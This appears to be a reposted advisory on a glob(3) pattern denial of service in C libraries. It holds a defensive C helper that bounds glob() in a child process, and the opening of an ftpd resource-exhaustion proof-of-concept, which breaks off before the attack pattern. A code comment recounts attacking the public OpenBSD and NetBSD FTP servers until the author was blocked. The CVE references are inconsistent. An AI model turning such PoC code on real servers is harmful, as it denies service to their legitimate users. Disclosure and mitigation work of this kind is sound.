GNU libc glob(3) "pattern" Remote Denial of Service Vulnerability

Published: 2011-05-02
Updated: 2011-05-02

Affected systems:
NetBSD NetBSD 5.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47671
CVE ID: CVE-2011-0418

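glibc is the C library implementation used by the vast majority of Linux operating systems.

GNU libc's implementation contains a glob(3) "pattern" remote denial-of-service vulnerability. A remote attacker can exploit it to make the affected computer unresponsive, denying service to legitimate users.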

<*Source: Maksymilian Arciemowicz (max@jestsuper.pl)
  *>
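
A service that expands client-supplied patterns can contain this kind of resource exhaustion by running glob(3) in a child process under CPU and address-space limits, so a runaway expansion kills only the child. The C code below is an added example, not part of the original advisory or PoC; the helper name bounded_glob_count and its limit parameters are assumptions.

```c
#include <glob.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (not from the advisory).
 * Returns the match count (>= 0), -1 if glob() failed or matched nothing,
 * -2 if the child was killed (for example by SIGXCPU) or could not report.
 * cpu_secs: CPU-time cap for the child; mem_bytes: address-space cap, 0 = none. */
int bounded_glob_count(const char *pattern, unsigned cpu_secs, size_t mem_bytes)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -2;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -2;
    }
    if (pid == 0) {                       /* child: limits first, then glob() */
        struct rlimit cpu = { cpu_secs, cpu_secs };
        struct rlimit mem = { mem_bytes, mem_bytes };
        glob_t g;
        int count = -1;
        close(fds[0]);
        if (setrlimit(RLIMIT_CPU, &cpu) != 0 ||
            (mem_bytes != 0 && setrlimit(RLIMIT_AS, &mem) != 0))
            _exit(2);                     /* never expand without the limits */
        if (glob(pattern, 0, NULL, &g) == 0) {
            count = (int)g.gl_pathc;
            globfree(&g);
        }
        if (write(fds[1], &count, sizeof count) != (ssize_t)sizeof count)
            _exit(2);
        _exit(0);
    }

    int count = -2, status = 0;           /* parent: collect the result */
    close(fds[1]);
    ssize_t n = read(fds[0], &count, sizeof count);
    close(fds[0]);
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status) ||
        WEXITSTATUS(status) != 0 || n != (ssize_t)sizeof count)
        return -2;
    return count;
}
```

A caller would treat -2 as a rejected request and return an error to the client instead of retrying the same pattern.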

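Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!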

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h> /* bzero() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
PoC for multiple vendors ftpd (libc/glob) resource exhaustion [CVE-2010-2632]

Affected Software (verified):
- OpenBSD 4.7
- NetBSD 5.0.2
- FreeBSD 7.3/8.1
- Oracle Sun Solaris 10

Affected Vendors (not verified):
- GNU Libc (glibc)
- Apple
- Microsoft
- HP
- more

Credit:
Maksymilian Arciemowicz
cxib I securityreason J com

Note:
With a similar script written in PHP (this same pattern), we have attacked OpenBSD/NetBSD servers with result:

- ftp.openbsd.org:
Connection refused

and in the end of attack

# telnet ftp.openbsd.org 21
Trying 129.128.5.191...
Connected to ftp.openbsd.org.
Escape character is '^]'.
421-  If you are seeing this message you have been blocked from using
421- this ftp server - most likely for mirroring content without paying
421- attention to what you were mirroring or where you should be mirroring
421- it from, or for excessive connection rates.
421- OpenBSD should *NOT* be mirrored from here, you should use
421- a second level mirror as described in
421

Connection closed by foreign host.
#

-ftp.netbsd.org:
no more access for anonymous =>
---
On 02.07.2010 20:29 CET, ftp.netbsd.org has returned:
530 User ftp access denied, connection limit of 160 reached.
---

and in the end, deny for my host.

*/

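/* Send one FTP command and log it; returns 0 on success, -1 on failure. */
int sendftp(int stream,char *what){
        int rc=0;
        if(-1==send(stream,what,strlen(what),0)){
                printf("Can't send %s\n",what);
                rc=-1;
        }else
                printf("send: %s\n",what);

        /* clear the whole command string; sizeof(what) is only the pointer size */
        bzero(what,strlen(what));
        return rc;
}

/* Read up to len bytes of the server reply and log it. */
void readftp(int stream,int len){
        char readline[len+1];
        int n=recv(stream,readline,len,0);
        if(n<1)
                printf("Can't read from stream\n");
        else{
                readline[n]='\0'; /* recv() does not NUL-terminate */
                printf("recv: %s\n",readline);
        }
}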


int sendstat(host,port,login,pass,pattern)
        char *host,*port,*login,*pass,*pattern;
{
        char buffer[1024]; // send ftp command buffer
        int     sockfd,n,error;
        struct addrinfo hints;
        struct addrinfo *res, *res0;

        memset(&hints, 0, sizeof(hints));
        hints.ai_family = PF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        error = getaddrinfo(host,port,&hints,&res0);

        if (error){
                errorcon:
                printf("Can`t connect\n.exit");
                exit(1);
        }

        if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0)     goto errorcon;
        if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;
